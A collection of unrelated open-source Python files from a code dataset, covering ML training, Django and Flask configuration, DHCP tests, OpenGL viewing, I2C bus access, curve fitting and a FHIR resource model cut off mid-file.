moving_avg_acc = sum(self.global_acc[max(0, len(self.global_acc) - 300):]) / sum(self.global_numel[max(0, len(self.global_numel) - 300):])
# visualize
self.vis_loss.plot_line(moving_avg_loss, self.global_iter)
self.vis_acc.plot_line(moving_avg_acc, self.global_iter)
# print
if i % print_every == 0:
template = "epoch = {} iter = {} loss = {:5.3f} correct = {:6.3f} r_correct = {:6.3f} c_correct = {:6.3f}"
print(template.format(epoch,
i,
loss.item(),
correct / target.numel() * 100.0,
r_correct / target.numel() * 100.0,
c_correct / target.numel() * 100.0))
# summarize for each epoch
template = "EPOCH = {} AVG_LOSS = {:5.3f} AVG_CORRECT = {:6.3f}\n"
print(template.format(epoch,
total_loss / total_iter,
total_correct / total_numel * 100.0))
def save(self, epoch, save_path="checkpoint"):
torch.save({
"epoch": epoch,
"model_state_dict": self.model.state_dict(),
"optimizer_state_dict": self.optimizer.state_dict(),
"scheduler_state_dict": self.scheduler.state_dict(),
"global_iter": self.global_iter
}, os.path.join(save_path, "aivivn_tone.model.ep{}".format(epoch)))
def set_seeds(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
def load_data(train_src, train_tgt, val_src, val_tgt, batch_size=64, save_path="checkpoint"):
# prepare dataset
print("Reading data...")
train = Seq2SeqDataset.from_file(train_src, train_tgt)
print("Building vocab...")
train.build_vocab(max_size=300)
val = Seq2SeqDataset.from_file(val_src, val_tgt, share_fields_from=train)
src_vocab = train.src_field.vocab
tgt_vocab = train.tgt_field.vocab
# save vocab
with open(os.path.join(save_path, "vocab.src"), "wb") as f:
dill.dump(src_vocab, f)
with open(os.path.join(save_path, "vocab.tgt"), "wb") as f:
dill.dump(tgt_vocab, f)
print("Source vocab size:", len(src_vocab))
print("Target vocab size:", len(tgt_vocab))
# data iterator
# keep sort=False and shuffle=False to speed up training and reduce memory usage
train_iterator = BucketIterator(dataset=train, batch_size=batch_size,
sort=False, sort_within_batch=True,
sort_key=lambda x: len(x.src),
shuffle=False, device=device)
val_iterator = BucketIterator(dataset=val, batch_size=batch_size, train=False,
sort=False, sort_within_batch=True,
sort_key=lambda x: len(x.src),
shuffle=False, device=device)
return src_vocab, tgt_vocab, train_iterator, val_iterator
def load_data_in_parts(train_src, train_tgt, val_src, val_tgt, batch_size=64, save_path="checkpoint"):
# prepare dataset
print("Reading data...")
val = Seq2SeqDataset.from_file(val_src, val_tgt)
print("Building vocab...")
val.build_vocab(max_size=300)
src_vocab = val.src_field.vocab
tgt_vocab = val.tgt_field.vocab
# save vocab
with open(os.path.join(save_path, "vocab.src"), "wb") as f:
dill.dump(src_vocab, f)
with open(os.path.join(save_path, "vocab.tgt"), "wb") as f:
dill.dump(tgt_vocab, f)
print("Source vocab size:", len(src_vocab))
print("Target vocab size:", len(tgt_vocab))
# data iterator
# keep sort=False and shuffle=False to speed up training and reduce memory usage
val_iterator = BucketIterator(dataset=val, batch_size=batch_size, train=False,
sort=False, sort_within_batch=True,
sort_key=lambda x: len(x.src),
shuffle=False, device=device)
return src_vocab, tgt_vocab, list(zip(train_src, train_tgt)), val, val_iterator, batch_size
if __name__ == "__main__":
train_src = ["data/train.src.0", "data/train.src.1", "data/train.src.2", "data/train.src.3"]
train_tgt = ["data/train.tgt.0", "data/train.tgt.1", "data/train.tgt.2", "data/train.tgt.3"]
val_src = "data/val.src"
val_tgt = "data/val.tgt"
# src_vocab_path = "checkpoint/vocab.src"
# tgt_vocab_path = "checkpoint/vocab.tgt"
# set random seeds
set_seeds(420)
# load vocab
# with open(src_vocab_path, "rb") as f:
# src_vocab = dill.load(f)
# with open(tgt_vocab_path, "rb") as f:
# tgt_vocab = dill.load(f)
# load data
src_vocab, tgt_vocab, train_parts, val, val_iterator, batch_size = load_data_in_parts(train_src, train_tgt, val_src, val_tgt)
# prepare trainer
trainer = Trainer(src_vocab, tgt_vocab)
# train
trainer.train_in_parts(train_parts, val, val_iterator, batch_size)
# trainer.resume_in_parts(train_parts, val, val_iterator, batch_size, save_path="checkpoint/aivivn_tone.model.ep19")
|
StarcoderdataPython
|
1765353
|
from django.core.management.base import BaseCommand
from hc.api.models import Flip
from hc.lib.date import month_boundaries
class Command(BaseCommand):
help = "Prune old Flip objects."
def handle(self, *args, **options):
threshold = min(month_boundaries(months=3))
q = Flip.objects.filter(created__lt=threshold)
n_pruned, _ = q.delete()
return "Done! Pruned %d flips." % n_pruned
|
StarcoderdataPython
|
12834608
|
<reponame>LunarWatcher/NN-chatbot-legacy
from time import *
def ifOrTuple():
boolVal = False
t = time()
for i in range(10000000):
"test" if boolVal else "testFalse"
print("Average: {}".format(time() - t))
combined = 0.0
t = time()
for i in range(10000000):
("testFalse", "test")[boolVal]
print("Average: {}".format(time() - t))
def updateOrManual():
t = time()
x = {}
for i in range(10000000):
x[i] = i
print("Average: {}".format(time() - t))
t = time()
for i in range(10000000):
x.update({i: i})
print("Average: {}".format(time() - t))
if __name__ == "__main__":
ifOrTuple()
print("####")
updateOrManual()
print("####")
|
StarcoderdataPython
|
1814998
|
<filename>tests/dhcpv4/process/test_v4_stateless.py
"""DHCPv4 Stateless clients"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_control
import srv_msg
import misc
@pytest.mark.v4
@pytest.mark.stateless
def test_v4_stateless_with_subnet_empty_pool():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '$(EMPTY)')
srv_control.config_srv_opt('subnet-mask', '255.255.255.0')
srv_control.config_srv_opt('time-offset', '50')
srv_control.config_srv_opt('routers', '192.168.3.11,172.16.58.3')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('1')
srv_msg.client_requests_option('2')
srv_msg.client_requests_option('3')
srv_msg.client_sets_value('Client', 'ciaddr', '$(CIADDR)')
srv_msg.client_send_msg('INFORM')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ACK')
srv_msg.response_check_content('Response', None, 'yiaddr', '0.0.0.0')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_option_content('Response', '1', None, 'value', '255.255.255.0')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_option_content('Response', '2', None, 'value', '50')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'value', '192.168.3.11')
srv_msg.response_check_option_content('Response', '3', None, 'value', '172.16.58.3')
|
StarcoderdataPython
|
5030009
|
<reponame>fivehealth/function-cache
__all__ = ['function_cache']
from functools import wraps
from inspect import signature
import logging
from .backends import get_cache_backend
logger = logging.getLogger(__name__)
def function_cache(name='default', keys=None, key_prefix=None, **kwargs):
cache_backend = get_cache_backend(name, keys=keys, **kwargs)
_key_prefix = key_prefix
def decorator(decorated_func):
sig = signature(decorated_func)
pass_cache_key = '_cache_key' in sig.parameters or any(param.kind == param.VAR_KEYWORD for param in sig.parameters.values())
cache_key_prefix = f'{decorated_func.__module__}.{decorated_func.__name__}-' if _key_prefix is None else _key_prefix
@wraps(decorated_func)
def wrapper(*wrapped_args, **wrapped_kwargs):
cache_key = f'{cache_key_prefix}{cache_backend.compute_key(wrapped_args, wrapped_kwargs)}'
cache_hit = cache_backend.exists(cache_key)
logger.debug(f'Cache {"hit" if cache_hit else "miss"} for cache key <{cache_key}>.')
if cache_hit:
return cache_backend.get(cache_key)
if pass_cache_key:
result = decorated_func(*wrapped_args, **wrapped_kwargs, _cache_key=cache_key)
else:
result = decorated_func(*wrapped_args, **wrapped_kwargs)
#end if
cache_backend.put(cache_key, result)
return result
#end def
return wrapper
#end def
return decorator
#end def
|
StarcoderdataPython
|
8125190
|
<gh_stars>1-10
from sequence_transfer.sequence import TokenSequence
tokens = ['My', '<PASSWORD>', 'is', '<PASSWORD>']
# 01 - We create a char sequence and access basic property
s = TokenSequence.new(tokens)
print(f"Text: {s.text}") # access text property
print(f"Size: {s.size}") # access size property
print(f"Length: {len(s)}") # alias of the size property
# 02 - Playing with subsequences
sub = s[1] # get the second token. (exactly: return a subsequence of size 1 that contain that second token)
print(f"Sequence `{sub.text}` starts at {sub.start} and stops at: {sub.stop}")
sub = s[1:3] # First and second token
print(f"Sequence `{sub.text}` starts at {sub.start} and stops at: {sub.stop}")
sub = s[:-1] # Last token
print(f"Sequence `{sub.text}` starts at {sub.start} and stops at: {sub.stop}")
# 03 - Iterating over a TokenSequence object create a subsequence of size 1 that correspond to each token:
for sub in s:
print(f"Token `{sub.text}` starts at {sub.start} and stops at: {sub.stop}")
# 04 show a subsequence of token in it's original context
sub = s[1, 2]
print(sub.in_context())
# 05 Conclusion:
# A TokenSequence behave more or less like python list of strings.
# But any subsequence of a TokenSequence "remember" the entire sequence of token.
|
StarcoderdataPython
|
8094290
|
<reponame>snake-biscuits/bsp_tool_examples
import OpenGL.GL as gl
from PyQt5 import QtCore, QtGui, QtWidgets
from . import camera
from . import render
from . import vector
camera.keybinds = {camera.FORWARD: [QtCore.Qt.Key_W],
camera.BACK: [QtCore.Qt.Key_S],
camera.LEFT: [QtCore.Qt.Key_A],
camera.RIGHT: [QtCore.Qt.Key_D],
camera.UP: [QtCore.Qt.Key_Q],
camera.DOWN: [QtCore.Qt.Key_E]}
class Viewport(QtWidgets.QOpenGLWidget):
def __init__(self):
super(Viewport, self).__init__(parent=None)
self.render_manager = render.Manager()
self.camera = camera.Camera((0, 0, 0)) # start camera at origin
self.clock = QtCore.QTimer()
self.clock.timeout.connect(self.update)
self.keys = set()
self.last_mouse_position = vector.vec2()
self.mouse_position = vector.vec2()
def initializeGL(self):
self.render_manager.init_GL()
self.render_manager.init_buffers()
self.clock.start(15) # tick length in milliseconds
self.last_mouse_position = vector.vec2(QtGui.QCursor.pos().x(), QtGui.QCursor.pos().y())
def keyPressEvent(self, event):
self.keys.add(event.key())
def keyReleaseEvent(self, event):
self.keys.discard(event.key())
def update(self):
tick_length = self.clock.interval() - self.clock.remainingTime()
self.makeCurrent()
gl.glRotate(30 * tick_length, 1, 0, 1.25) # orbit camera
self.mouse_position = vector.vec2(QtGui.QCursor.pos().x(), QtGui.QCursor.pos().y())
mouse_motion = self.mouse_position - self.last_mouse_position
self.last_mouse_position = self.mouse_position
self.camera.update(mouse_motion, self.keys, tick_length)
self.render_manager.update()
self.doneCurrent()
super(Viewport, self).update() # calls paintGL
def paintGL(self):
gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
gl.glLoadIdentity()
self.camera.set()
# set camera rotation
# draw 2d skybox
# move camera
self.render_manager.draw()
# origin marker
gl.glUseProgram(0)
gl.glBegin(gl.GL_LINES)
gl.glColor(1, 0, 0) # X+
gl.glVertex(0, 0, 0)
gl.glVertex(1, 0, 0)
gl.glColor(0, 1, 0) # Y+
gl.glVertex(0, 0, 0)
gl.glVertex(0, 1, 0)
gl.glColor(0, 0, 1) # Z+
gl.glVertex(0, 0, 0)
gl.glVertex(0, 0, 1)
gl.glEnd()
def view_bsp(bsp): # so far rBSP only
app = QtWidgets.QApplication([])
viewport = Viewport()
viewport.setGeometry(128, 64, 576, 576)
# just grab the first mesh of a rBSP
special_vertices = bsp.vertices_of_mesh(0)
vertices = list()
for vertex in special_vertices:
position = bsp.VERTICES[vertex.position_index]
normal = bsp.VERTEX_NORMALS[vertex.normal_index]
vertices.append((position, normal, vertex.uv)) # universal format
indices = [i for i, v in enumerate(vertices)]
viewport.show()
mesh_0 = render.Renderable("Mesh 0", "mesh_flat", vertices, indices)
viewport.render_manager.add_renderable(mesh_0)
app.exec_()
|
StarcoderdataPython
|
1622064
|
import unittest
from config import *
from main import app
class TestConfigVariableSetting(unittest.TestCase):
def test_testing_app_variables(self):
""" tests if app takes correct variables after being set up as test"""
self.app = app
self.app.config.from_object('config.TestingConfig')
self.assertTrue(self.app.config['TESTING'],
"TESTING app variable"
"should be set to True")
self.assertFalse(self.app.config['DEBUG'], "DEBUG app variable"
"should be set to False")
def test_production_app_variables(self):
""" tests if app takes correct variables after being set up as production"""
self.app = app
self.app.config.from_object('config.ProductionConfig')
self.assertFalse(self.app.config['TESTING'],
"TESTING app variable"
"should be set to False")
self.assertFalse(self.app.config['DEBUG'], "DEBUG app variable"
"should be set to False")
def test_development_app_variables(self):
""" tests if app takes correct variables after being set up as development"""
self.app = app
self.app.config.from_object('config.DevelopmentConfig')
self.assertFalse(self.app.config['TESTING'],
"TESTING app variable"
"should be set to False")
self.assertTrue(self.app.config['DEBUG'], "DEBUG app variable"
"should be set to True")
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
4816210
|
from .obje import *
from .devi import *
from .objs.ctrl import CtrlTag
from supyr_struct.defs.tag_def import TagDef
# replace the object_type enum one that uses
# the correct default value for this object
obje_attrs = dict(obje_attrs)
obje_attrs[0] = dict(obje_attrs[0], DEFAULT=8)
ctrl_attrs = Struct("ctrl_attrs",
SEnum16('type',
'toggle_switch',
'on_button',
'off_button',
'call_button'
),
SEnum16('triggers_when',
'touched_by_player',
'destroyed'
),
float_zero_to_one('call_value'),
Pad(80),
dependency("on", valid_event_effects),
dependency("off", valid_event_effects),
dependency("deny", valid_event_effects),
)
ctrl_body = Struct("tagdata",
obje_attrs,
devi_attrs,
ctrl_attrs,
SIZE=792,
)
def get():
return ctrl_def
ctrl_def = TagDef("ctrl",
blam_header('ctrl'),
ctrl_body,
ext=".device_control", endian=">", tag_cls=CtrlTag
)
|
StarcoderdataPython
|
5390
|
<reponame>yanwunhao/auto-mshts
from util.io import read_setting_json, read_0h_data, read_24h_data, draw_single_curve
from util.convert import split_array_into_samples, calculate_avg_of_sample, convert_to_percentage
from util.calculus import calculate_summary_of_sample, fit_sigmoid_curve
import matplotlib.pyplot as plt
import numpy as np
import csv
setting = read_setting_json()
setting = setting["rule"]
# load experiment parameter
# experiment parameter is stored in file of ./data/setting.json
initial_filename = setting["0h_datafile"]
final_filename = setting["24h_datafile"]
# sample width and height are the size of each sample area
sample_width = setting["sample_width"]
sample_height = setting["sample_height"]
dilution_protocol = setting["dilution_protocol"]
# width of each dilution
basic_width = setting["basic_width"]
# number of each control group
control_number_list = setting["control_number"]
# output directory
output_directory = setting["output_directory"]
# import initial concentration and calculate x_data
initial_concentration = setting["initial_concentration"]
repeat_times = int(sample_width / basic_width)
x_data = []
current_concentration = initial_concentration
for i in range(repeat_times):
x_data.append(current_concentration)
current_concentration /= dilution_protocol
# load raw data
initial_sd_data = read_0h_data()
final_sd_data = read_24h_data()
# reshape data into the size of board
rebuild_0h_data = initial_sd_data.reshape((32, -1))
rebuild_24h_data = final_sd_data.reshape((32, -1))
# reshape data into a 2-dimensional array contains each group data
sample_divided_list_0h = split_array_into_samples(rebuild_0h_data, sample_width, sample_height)
sample_divided_list_24h = split_array_into_samples(rebuild_24h_data, sample_width, sample_height)
# handle data of control groups
control_0h_summary = 0
for number in control_number_list:
number = number - 1
sample = sample_divided_list_0h[number]
control_0h_summary = control_0h_summary + calculate_summary_of_sample(sample)
control_0h_average = control_0h_summary / (sample_width * sample_height * len(control_number_list))
control_24h_summary = 0
for number in control_number_list:
number = number - 1
sample = sample_divided_list_24h[number]
control_24h_summary = control_24h_summary + calculate_summary_of_sample(sample)
control_24h_average = control_24h_summary / (sample_width * sample_height * len(control_number_list))
# calculate standard deviation of each grid
sd_matrix = []
for line in rebuild_24h_data:
new_line = []
for element in line:
sd_data = (float(element) - control_0h_average.item()) \
/ (control_24h_average.item() - control_0h_average.item())
new_line.append(sd_data)
sd_matrix.append(new_line)
sd_matrix = np.array(sd_matrix)
# split array into different samples
sd_groups = split_array_into_samples(sd_matrix, sample_width, sample_height)
sd_groups = np.array(sd_groups, dtype=float)
RESULT_LIST = []
for sample in sd_groups:
result = calculate_avg_of_sample(sample, sample_width, basic_width)
RESULT_LIST.append(result)
RESULT_LIST = np.array(RESULT_LIST)
FULL_RESULT_LIST = []
for group in sd_groups:
x_index = 0
y_index = 0
sample_buffer = []
data_buffer = []
while y_index < sample_height:
while x_index < basic_width:
x = x_index
while x < sample_width:
data_buffer.append(group[y_index][x])
x += basic_width
sample_buffer.append(data_buffer)
data_buffer = []
x_index += 1
y_index += 1
x_index = 0
FULL_RESULT_LIST.append(sample_buffer)
FULL_RESULT_LIST = np.array(FULL_RESULT_LIST, dtype=float)
optional_color = ['red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple']
EC50_LIST = []
EC50_AVG_LIST = []
sample_num = 0
for SAMPLE in FULL_RESULT_LIST:
sample_num += 1
fig, ax = plt.subplots()
index = 0
ax.set_title('Sample '+str(sample_num))
x_buffer = []
x_sampling_buffer = []
y_sampling_buffer = []
for repeat in SAMPLE:
x, y, x_sampling, y_sampling = fit_sigmoid_curve(x_data, repeat)
x_buffer.append(x)
x_sampling_buffer.append(x_sampling)
y_sampling_buffer.append(y_sampling)
draw_single_curve(ax, x, y, x_sampling, y_sampling, optional_color[index])
index += 1
EC50_LIST.append(x_buffer)
# draw the average result
avg = np.mean(x_buffer)
EC50_AVG_LIST.append(avg)
# draw the average curve
x_sampling_buffer = np.array(x_sampling_buffer).T
y_sampling_buffer = np.array(y_sampling_buffer).T
x_sampling_avg = []
y_sampling_avg = []
for line in x_sampling_buffer:
x_sampling_avg.append(np.mean(line))
for line in y_sampling_buffer:
y_sampling_avg.append(np.mean(line))
ax.plot(avg, 0.5, 'o', color='black')
ax.plot(x_sampling_avg, y_sampling_avg, color='black')
plt.savefig("./output/" + output_directory + "/figs" + "/Sample " + str(sample_num))
plt.cla()
plt.close(fig)
# output grouped result
output_f_grouped = open("./output/" + output_directory + "/result_grouped.csv", "w")
csv_writer_grouped = csv.writer(output_f_grouped)
csv_writer_grouped.writerow(["initial concentration: " + str(initial_concentration), "dilution protocol: " + str(dilution_protocol)])
csv_writer_grouped.writerow("")
sample_num = 0
for SAMPLE in FULL_RESULT_LIST:
SAMPLE = SAMPLE.T
sample_num += 1
csv_writer_grouped.writerow(["Sample " + str(sample_num)])
for repeat in SAMPLE:
csv_writer_grouped.writerow(repeat)
csv_writer_grouped.writerow("")
ec50_result_list = []
for ec50_index in EC50_LIST[sample_num-1]:
ec50_result_list.append(10**ec50_index)
csv_writer_grouped.writerow(ec50_result_list)
average_ec50 = np.power(10, EC50_AVG_LIST[sample_num-1])
csv_writer_grouped.writerow([])
csv_writer_grouped.writerow(["Average EC50", "Std"])
csv_writer_grouped.writerow([average_ec50, np.std(ec50_result_list)])
csv_writer_grouped.writerow("")
output_f_grouped.close()
output_f_full = open("./output/" + output_directory + "/result_full.csv", "w")
csv_writer_full = csv.writer(output_f_full)
for line in sd_matrix:
csv_writer_full.writerow(line)
output_f_full.close()
print("Finished")
|
StarcoderdataPython
|
123200
|
from transformers import CamembertTokenizer
import os
tokenizer_dirname = os.path.dirname(__file__)
tokenizer_path = os.path.join(tokenizer_dirname, '../../res/models/emotion_classif/camembert_base/camembert-base-tokenizer')
class EmotionClassifTokenizer(object):
"""
Class used to tokenize french sentences transcribed from audio using camemBERT tokenizer
"""
tokenizer = CamembertTokenizer.from_pretrained(tokenizer_path)
def __init__(self):
"""
uses camembert tokenizer from huggingface in all cases
"""
"""
dirname = os.path.dirname(__file__)
tokenizer_path = os.path.join(dirname, '../../models/emotion_classif/camembert_base/camembert-base-tokenizer')
camembert_tokenizer = CamembertTokenizer.from_pretrained(tokenizer_path)
self.tokenizer = camembert_tokenizer
"""
pass
def tokenize(self, sentence_list, max_length=50):
"""
uses camembert tokenizer to tokenize sentences, pad them (according to max_len) and truncate them if too long for camembert.
The default value of the param max_len comes from monologg github repo (optimal hyperparam value of the model allegedly)
"""
return self.tokenizer(sentence_list, max_length=max_length, padding='max_length', truncation=True, return_tensors='pt')
|
StarcoderdataPython
|
12824050
|
<reponame>Qiaojilim/raccroche_module2<filename>raccroche/module2/save_mwmoutput.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 13 15:16:43 2020
@author: qiaojixu
"""
"""
Module discription:
--------------------
module to save all mwm adjacency output:
"""
def save_simple (WS1,WS2, TreeNode, gf1, gf2,gf1_old, gf2_old, results_dir):
with open (results_dir +'InputPyfile/mwmOutput/W'+ str(WS1)+ TreeNode + '_' + str(gf1_old) + '_' + str(gf2_old) + '.txt') as f:
with open (results_dir +'InputPyfile/mwmOutput/W'+ str(WS2)+ TreeNode + '_' + str(gf1) + '_' + str(gf2) + '.txt','a') as f1:
for line in f:
f1.write(line)
|
StarcoderdataPython
|
9797118
|
# coding=utf-8
"""
Flask APP配置
app = Flask(__name__)
1. 直接设置
app.config['TESTING'] = True
某些配置值还转移到了 Flask 对象中,可以直接通过 Flask 来操作:
app.testing = True
一次更新多个配置值可以使用 dict.update() 方法:
app.config.update(
TESTING=True,
SECRET_KEY=b'aaa'
)
2. 通过对象加载
app.config.from_object('yourapplication.default_settings')
3. 通过环境变量加载配置
export MyAppConfig=/path/to/settings.cfg
app.config.from_envvar('MyAppConfig')
4. 通过配置文件
app.config.from_pyfile('dev_config.py') # 这里dev_config.py是文件
"""
import os
from config import PATH_LOG
from helper.helper_date import HelperDate
class BaseSettings(object):
"""
基本配置
不同环境的配置都继承此类
"""
# 密钥用于会话 cookie 的安全签名,并可用于应用或者扩展的其他安全需求。import os; print(os.urandom(24))
SECRET_KEY = b'<KEY>'
FLASK_ENV = 'development'
# 是否开启调试模式
DEBUG = False
# 开启测试模式
TESTING = False
HOST = '127.0.0.1'
PORT = 5000
THREADED = True
# 如果设置成 True,SQLAlchemy 将会记录所有 发到标准输出(stderr)的语句
SQLALCHEMY_ECHO = False
#from .mysql import SQLALCHEMY_DATABASE_URI
# SQLAlchemy配置
#SQLALCHEMY_DATABASE_URI = SQLALCHEMY_DATABASE_URI
# 多库
#SQLALCHEMY_BINDS = MYSQL_BINDS
# 数据库连接池的大小。默认是数据库引擎的默认值 (通常是 5)。
SQLALCHEMY_POOL_SIZE = 5
# 指定数据库连接池的超时时间。默认是 10
SQLALCHEMY_POOL_TIMEOUT = 10
# 如果设置成 True (默认情况),Flask-SQLAlchemy 将会追踪对象的修改并且发送信号。这需要额外的内存, 如果不必要的可以禁用它。
SQLALCHEMY_TRACK_MODIFICATIONS = False
# logging
def _make_logfile(log_name=''):
# 如果未指定日志,则混合记录一起
if not log_name:
return os.path.join(PATH_LOG, 'mixed_' + HelperDate.date_today() + '.log')
# 每个日志一个目录
log_dir = os.path.join(PATH_LOG, '%s' % log_name)
# 目录不存在,则创建
if not os.path.exists(log_dir):
os.makedirs(log_dir, 0o777)
return os.path.join(log_dir, '%s_' + HelperDate.date_today() + '.log') % log_name
LOG_LEVEL = 'DEBUG'
#LOG_FILE = os.path.join(PATH_LOG, '%s_' + os.sep + '%s' + HelperDate.date_today() + '.log')
LOG_FORMAT = os.linesep.join(
(
'%(asctime)s-【%(levelname)s】:[%(filename)s-%(module)s]=>[%(funcName)s:%(lineno)d]',
'%(pathname)s',
' %(message)s',
'-' * 80
)
)
|
StarcoderdataPython
|
53403
|
<filename>.ci/test_lint_doctests.py<gh_stars>0
# Pytest stub for running lint tests and doctests
# Running these checks through pytest allows us to report any errors in Junit format,
# which is posted directly on the PR
import os
import pathlib
import shutil
import subprocess
import textwrap
import pytest
def check_output(proc: subprocess.CompletedProcess):
# Check the subprocess output, and raise an exception with the stdout/stderr dump if there was a non-zero exit
# The `check=True` flag available in `subprocess.run` does not print stdout/stderr
if proc.returncode == 0:
return
error_msg = textwrap.dedent(f"""\
Command {proc.args} failed with exit code {proc.returncode}.
----Begin stdout----
{proc.stdout}
----End stdout------
----Begin stderr----
{proc.stderr}
----End stderr------""")
raise RuntimeError(error_msg)
@pytest.mark.timeout(0)
def test_run_pre_commit_hooks():
composer_root = os.path.join(os.path.dirname(__file__), "..")
check_output(
subprocess.run(
["pre-commit", "run", "--all-files", "--show-diff-on-failure"],
cwd=composer_root,
capture_output=True,
text=True,
))
@pytest.mark.timeout(0)
def test_run_doctests():
docs_folder = pathlib.Path(os.path.dirname(__file__)) / '..' / 'docs'
api_reference_folder = docs_folder / 'source' / 'api_reference'
# Remove the `api_reference` folder, which isn't automatically removed via `make clean`
shutil.rmtree(api_reference_folder, ignore_errors=True)
check_output(subprocess.run(["make", "clean"], cwd=docs_folder, capture_output=True, text=True))
# Must build the html first to ensure that doctests in .. autosummary:: generated pages are included
check_output(subprocess.run(["make", "html"], cwd=docs_folder, capture_output=True, text=True))
check_output(subprocess.run(["make", "doctest"], cwd=docs_folder, capture_output=True, text=True))
|
StarcoderdataPython
|
6504664
|
<reponame>Sab0tag3d/pyppeteer<gh_stars>1000+
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Utility functions."""
import gc
import socket
from typing import Dict, Optional
from pyppeteer.chromium_downloader import check_chromium, chromium_executable
from pyppeteer.chromium_downloader import download_chromium
__all__ = [
'check_chromium',
'chromium_executable',
'download_chromium',
'get_free_port',
'merge_dict',
]
def get_free_port() -> int:
"""Get free port."""
sock = socket.socket()
sock.bind(('localhost', 0))
port = sock.getsockname()[1]
sock.close()
del sock
gc.collect()
return port
def merge_dict(dict1: Optional[Dict], dict2: Optional[Dict]) -> Dict:
"""Merge two dictionaries into new one."""
new_dict = {}
if dict1:
new_dict.update(dict1)
if dict2:
new_dict.update(dict2)
return new_dict
|
StarcoderdataPython
|
9750734
|
<filename>smbus2/__main__.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ## #############################################################
# board.py
#
# Author: <NAME>
# Licence: MIT
# Date: 2020.03.01
#
# ## #############################################################
from . import smbus as smbus2
from .vi2cbus import Vi2cSlave
import struct
SLAVE_ADDR = 0x0a
class TestSlave(Vi2cSlave):
def __init__(self):
super().__init__(SLAVE_ADDR)
def read(self):
return [0, 0, 69, 0]
def write(self, value):
print("Write:", value)
slave = TestSlave()
def read(i2c):
# Creates a message object to read 4 bytes from SLAVE_ADDR
msg = smbus2.i2c_msg.read(SLAVE_ADDR, 4)
i2c.i2c_rdwr(msg) # Performs read
if msg.len > 0:
# if we got data, unpack and print
val = struct.unpack('<f', msg.buf)
print('Received: {} = {}'.format(msg.buf, val))
else:
print('No data received')
def write(i2c):
val = 100
data = struct.pack('<f', val) # Packs number as float
# Creates a message object to write 4 bytes from SLAVE_ADDR
msg = smbus2.i2c_msg.write(SLAVE_ADDR, data)
i2c.i2c_rdwr(msg) # Performs write
def main():
i2c = smbus2.SMBus(1)
read(i2c)
write(i2c)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3314611
|
<reponame>ItayGoren/fhir.resources<filename>fhir/resources/evidencevariable.py
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/EvidenceVariable
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
from typing import Any, Dict
from typing import List as ListType
from pydantic import Field, root_validator
from . import backboneelement, domainresource, fhirtypes
class EvidenceVariable(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A population, intervention, or exposure definition.
The EvidenceVariable resource describes a "PICO" element that knowledge
(evidence, assertion, recommendation) is about.
"""
resource_type = Field("EvidenceVariable", const=True)
approvalDate: fhirtypes.Date = Field(
None,
alias="approvalDate",
title="When the evidence variable was approved by publisher",
description=(
"The date on which the resource content was approved by the publisher. "
"Approval happens once when the content is officially approved for "
"usage."
),
# if property is element of this resource.
element_property=True,
)
approvalDate__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_approvalDate", title="Extension field for ``approvalDate``."
)
author: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="author",
title="Who authored the content",
description=(
"An individiual or organization primarily involved in the creation and "
"maintenance of the content."
),
# if property is element of this resource.
element_property=True,
)
characteristic: ListType[fhirtypes.EvidenceVariableCharacteristicType] = Field(
...,
alias="characteristic",
title="What defines the members of the evidence element",
description=(
"A characteristic that defines the members of the evidence element. "
'Multiple characteristics are applied with "and" semantics.'
),
# if property is element of this resource.
element_property=True,
)
contact: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="contact",
title="Contact details for the publisher",
description=(
"Contact details to assist a user in finding and communicating with the"
" publisher."
),
# if property is element of this resource.
element_property=True,
)
copyright: fhirtypes.Markdown = Field(
None,
alias="copyright",
title="Use and/or publishing restrictions",
description=(
"A copyright statement relating to the evidence variable and/or its "
"contents. Copyright statements are generally legal restrictions on the"
" use and publishing of the evidence variable."
),
# if property is element of this resource.
element_property=True,
)
copyright__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_copyright", title="Extension field for ``copyright``."
)
date: fhirtypes.DateTime = Field(
None,
alias="date",
title="Date last changed",
description=(
"The date (and optionally time) when the evidence variable was "
"published. The date must change when the business version changes and "
"it must change if the status code changes. In addition, it should "
"change when the substantive content of the evidence variable changes."
),
# if property is element of this resource.
element_property=True,
)
date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_date", title="Extension field for ``date``."
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Natural language description of the evidence variable",
description=(
"A free text natural language description of the evidence variable from"
" a consumer's perspective."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
editor: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="editor",
title="Who edited the content",
description=(
"An individual or organization primarily responsible for internal "
"coherence of the content."
),
# if property is element of this resource.
element_property=True,
)
effectivePeriod: fhirtypes.PeriodType = Field(
None,
alias="effectivePeriod",
title="When the evidence variable is expected to be used",
description=(
"The period during which the evidence variable content was or is "
"planned to be in active use."
),
# if property is element of this resource.
